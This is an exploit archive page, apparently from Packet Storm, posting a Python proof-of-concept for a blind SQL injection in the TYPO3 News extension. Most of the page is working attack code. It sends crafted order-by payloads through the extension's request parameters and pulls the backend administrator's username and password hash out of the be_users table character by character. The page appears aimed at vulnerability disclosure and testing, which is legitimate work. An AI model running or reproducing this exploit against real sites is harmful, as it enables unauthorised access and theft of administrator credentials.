Exploit the possiblities

TYPO3 News Module SQL Injection

TYPO3 News Module SQL Injection
Posted Apr 27, 2017
Authored by Charles FOL

The TYPO3 News module suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | c228a9bf723e2701aa1a67c101072d81

TYPO3 News Module SQL Injection

Change Mirror Download
# Exploit Title: TYPO3 News Module SQL Injection
# Vendor Homepage: https://typo3.org/extensions/repository/view/news
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/typo3-news-module-sqli


#!/usr/bin/python3

# TYPO3 News Module SQL Injection Exploit
# https://www.ambionics.io/blog/typo3-news-module-sqli
# cf
#
# The injection algorithm is not optimized, this is just meant to be a POC.
#

import requests
import string


session = requests.Session()
session.proxies = {'http': 'localhost:8080'}


# Change this
URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
PATTERN0 = 'Article #1'
PATTERN1 = 'Article #2'

FULL_CHARSET = string.ascii_letters + string.digits + '$./'


def blind(field, table, condition, charset):

# We add 9 so that the result has two digits

# If the length is superior to 100-9 it won't work

size = blind_size(

'length(%s)+9' % field, table, condition,

2, string.digits

)

size = int(size) - 9

data = blind_size(

field, table, condition,

size, charset

)

return data


def select_position(field, table, condition, position, char):

payload = 'select(%s)from(%s)where(%s)' % (

field, table, condition

)

payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)

payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (

payload, ord(char)

)

return payload


def blind_size(field, table, condition, size, charset):

string = ''

for position in range(size):

for char in charset:

payload = select_position(field, table, condition, position+1, char)

if test(payload):

string += char

print(string)

break

else:

raise ValueError('Char was not found')



return string


def test(payload):

response = session.post(

URL,

data=data(payload)

)

response = response.text

return response.index(PATTERN0) < response.index(PATTERN1)

def data(payload):

return {

'tx_news_pi1[overwriteDemand][order]': payload,

'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,

'tx_news_pi1[search][subject]': '',

'tx_news_pi1[search][minimumDate]': '2016-01-01',

'tx_news_pi1[search][maximumDate]': '2016-12-31',

}

# Exploit

print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    1 Files
  • 22
    Jan 22nd
    15 Files
  • 23
    Jan 23rd
    15 Files
  • 24
    Jan 24th
    5 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close